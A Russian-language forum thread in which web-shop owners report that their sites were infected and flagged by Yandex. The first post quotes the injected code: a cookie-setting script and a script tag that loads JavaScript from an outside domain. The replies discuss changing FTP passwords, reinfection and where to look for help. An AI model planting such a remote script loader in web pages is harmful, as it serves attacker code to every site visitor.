Ребята помогите. Вирус!
Сегодня Яндекс все страницы магазина отметил что они с вирусом.
Вот эта дрянь прописалась на страницах магазина http://ecell.com.ua по 10 раз на странице
<script languge='JavaScript'>
function set_cookie(name, value,expires){
if (!expires){
expires = new Date();
}
document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() + "; path=/";
}
var name = "act";
var tmp = "1";
expires = new Date();
expires.setTime(expires.getTime() + (1000 * 86400 * 1));
set_cookie(name,tmp,expires);
</script>
<script language='JavaScript' src='http://llvelnternet.ru/?in=23311'></script>
Я не могу найти где она прописана. Помогите кто чем может. Заранее спасибо
Очень странно, но все коды исчезли как только я поменял пароли ftp
Эта дрянь довольно умная. У самого на сайте такая же сидит. Видимо все шопосовские магазины через одну уяезвимость поимели.
У меня тоже она вроде бы пропала - в самих файлах сайта ничего подобного не нашел, сайт вроде прошел проверку в яндексе на вирусы и был реабилитирован, а через 3 часа снова был помечен как вредоносный. Черт знает как они ее спрятали так.
Я тоже думаю что эта штука до сих пор у меня сидит. Кодов нигде на страницах нет, но сайт тормозит ужасно. Что делать даже не знаю. Может кто знает помогите.
И у меня такая же история. :'(
Для начала вот сюда загляните http://www.shopos.ru/forum/index.php?topic=6706.0
Источник
|
